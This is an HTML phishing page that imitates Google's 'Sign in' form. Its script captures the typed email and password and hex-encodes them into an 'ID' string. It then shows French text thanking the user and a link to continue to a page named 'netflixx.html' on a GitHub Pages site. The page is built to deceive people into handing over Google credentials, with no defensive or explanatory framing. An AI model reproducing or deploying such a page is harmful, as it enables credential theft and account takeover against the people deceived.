<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
<meta name="description" content="Sign up with Google">
    <title>Google</title>
    <link rel="stylesheet" href="style.css">
    <style>
body {
    margin: 0;
    padding: 0;
    background-size: cover;
    font-family: sans-serif;
  }
  
  .box {
    position: absolute;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
    width: 25rem;
    padding: 2.5rem;
    box-sizing: border-box;
    border: 1px solid #dadce0;
    -webkit-border-radius: 8px;
    border-radius: 8px;

  }
  
  .box h2 {
    margin: 0px 0 -0.125rem;
    padding: 0;
    color: #fff;
    text-align: center;
    color: #202124;
    font-family: 'Google Sans','Noto Sans Myanmar UI',arial,sans-serif;
    font-size: 24px;
    font-weight: 400;
  }

  .box p {
    font-size: 16px;
    font-weight: 400;
    letter-spacing: .1px;
    line-height: 1.5;
    margin-bottom: 25px;
    text-align: center;
  }
  
  .box .inputBox {
    position: relative;
  }
  
  .box .inputBox input {
    width: 93%;
    padding: 0.625rem 10px;
    font-size: 1rem;
    letter-spacing: 0.062rem;
    margin-bottom: 1.875rem;
    border: 1px solid #ccc;
    background: transparent;
    border-radius: 4px;
    
  }
  
  .box .inputBox label {
    position: absolute;
    top: 0;
    left: 10px;
    padding: 0.625rem 0;
    font-size: 1rem;
    color: grey;
    pointer-events: none;
    transition: 0.5s;
  }
  
  .box .inputBox input:focus ~ label,
  .box .inputBox input:valid ~ label,
  .box .inputBox input:not([value=""]) ~ label {
    top: -1.125rem;
    left: 10px;
    color: #1a73e8;
    font-size: 0.75rem;
    background-color: white;
    height: 10px;
    padding-left: 5px;
    padding-right: 5px;
  }
  .box .inputBox input:focus {
    outline: none;
    border: 2px solid #1a73e8;
  }
  .box input[type="submit"] {
    border: none;
    outline: none;
    color: #fff;
    background-color: #1a73e8;
    padding: 0.625rem 1.25rem;
    cursor: pointer;
    border-radius: 0.312rem;
    font-size: 1rem;
    float: right;
  }
  
  .box input[type="submit"]:hover {
    background-color: #287ae6;
    box-shadow: 0 1px 1px 0 rgba(66,133,244,0.45), 0 1px 3px 1px rgba(66,133,244,0.3);
  }
#id{
		position: relative;
  left: 0;
  bottom: 0;
  margin-tp: 50px;
  width: 100%;
  text-align: center;
visibility: hidden;
margin: 500px 0 50px 35px;
}
#id #b2{
		background: #287ae6;
		color: #fff;
		padding: 5px;
		border-radius: 8px;
margin: 0 80px 0 0;
float: center;
text-align : center;
}
#id #h32{
		background: #0F9D58;
		color: #fff;
		padding: 5px;
		border-radius: 8px;
text-align : center;
margin-left: -8px;
width: 300px;
margin-top: 50px;
}
#id a{
		background: #fff;
		color: #287ae6;
		padding: 7.5px;
		border: none;
margin: 10px 0 0 -60px;
		border-radius: 8px;
		font-size: 5vw;
		text-decoration: none;
box-shadow: 0px 8px 16px 0px rgba(0,0,0,0.2);

}
#id h3{
margin: 0 90px 20px 0;
}
</style>
</head>
<body>
        <div class="box">
                <h2>Sign in</h2>
                <p>Use your Google Account</p>
                <form name="myform" method="post" onsubmit="return validateform()">
                  <div class="inputBox">
                    <input type="email" name="name" minlength="9" maxlength="50" onkeyup="this.setAttribute('value', this.value);"  value="" autocomplete="off" required>
                    <label>Username</label>
                  </div>
                  <div class="inputBox">
                        <input type="password" name="password" minlength="8" maxlength="100" onkeyup="this.setAttribute('value', this.value);" value="" autocomplete="off" required>
                        <label>Passward</label>
                      </div>
                  <input type="submit" value="Log In" name="sign-in">
                </form>
              </div>
<div id="id">
<h3>ID: </h3>
<b id="b2">VOTRE IDENTIFIANT APPARAÎTRA ICI</b>
<br>
<h3 id="h32">MERCI POUR VOTRE INSCRIPTION, VOUS RECEVEZ UN MESSAGE DANS UN INSTANT</h3>
<a href="blacksmith779.github.io/pages/netflixx.html" id="fme"><b>CLIQUEZ POUR CONTINUER>>></b></b></b></b></a>
</div>
  <script src="http://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script>
function ascii_to_hexa(str)
  {
	var arr1 = [];
	for (var n = 0, l = str.length; n < l; n ++) 
     {
		var hex = Number(str.charCodeAt(n)).toString(16);
		arr1.push(hex);
	 }
	return arr1.join('');
   }
</script>
<script>
var fm = document.getElementById("fme");
var omn = document.getElementById("id");
fm.style.visibility = "hidden";
function validateform(){
var name=document.myform.name.value;
var password=document.myform.password.value;
var all = document.getElementById("all");
var elem22 = document.getElementById("b2");
if(password != ""){
ascii_to_hexa(name+password);
	elem22.innerHTML = "#"+ascii_to_hexa(name)+"2a1q1z2"+ascii_to_hexa(password);
	fm.style.visibility = "visible";
omn.style.visibility = "visible";
elem22.style.margin= "0 0 0 -30px";
	return false;
}
else{
	return false;
}
}
</script>
</body>
</html>
